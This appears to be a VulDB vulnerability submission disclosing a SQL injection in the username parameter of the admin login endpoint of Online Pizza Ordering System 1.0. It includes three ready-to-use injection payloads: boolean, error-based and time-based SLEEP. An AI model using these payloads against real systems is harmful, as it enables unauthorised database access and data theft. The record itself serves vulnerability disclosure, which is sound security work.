Title | SQL injection vulnerability exists in username parameter of Online Pizza Ordering System |
---|
Description | SQL injection vulnerability exists in username parameter of /admin/ajax.php file of Online Pizza Ordering System
Important user data or system data may be leaked and system security may be compromised
The environment is secure and the information can be used by malicious users.
When visit /admin/ajax.php and action parameter is ‘login’,it will include admin_class.php,and username parameter can do sql injection.
Payload:username=admin' AND 2019=2019-- pyju&password=admin123
or username=admin' AND (SELECT 4140 FROM(SELECT COUNT(*),CONCAT(0x7170707871,(SELECT (ELT(4140=4140,1))),0x716b7a6b71,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- xsOC&password=admin123
or username=admin' AND (SELECT 9716 FROM (SELECT(SLEEP(5)))PnRb)-- aily&password=admin123 |
---|
Source | ⚠️ https://github.com/E1CHO/cve_hub/blob/main/Online%20Pizza%20Ordering%20System/Online%20Pizza%20Ordering%20System%20sql%20vlun(3).pdf |
---|
User | SSL_Seven_Security Lab_WangZhiQiang_XiaoZiLong (UID 38936) |
---|
Submission | 13.03.2023 06:21 (2 лет назад) |
---|
Moderation | 13.03.2023 08:19 (2 hours later) |
---|
Status | принято |
---|
VulDB Entry | 222872 [SourceCodester Online Pizza Ordering System 1.0 /admin/ajax.php username sql injection] |
---|
Points | 20 |
---|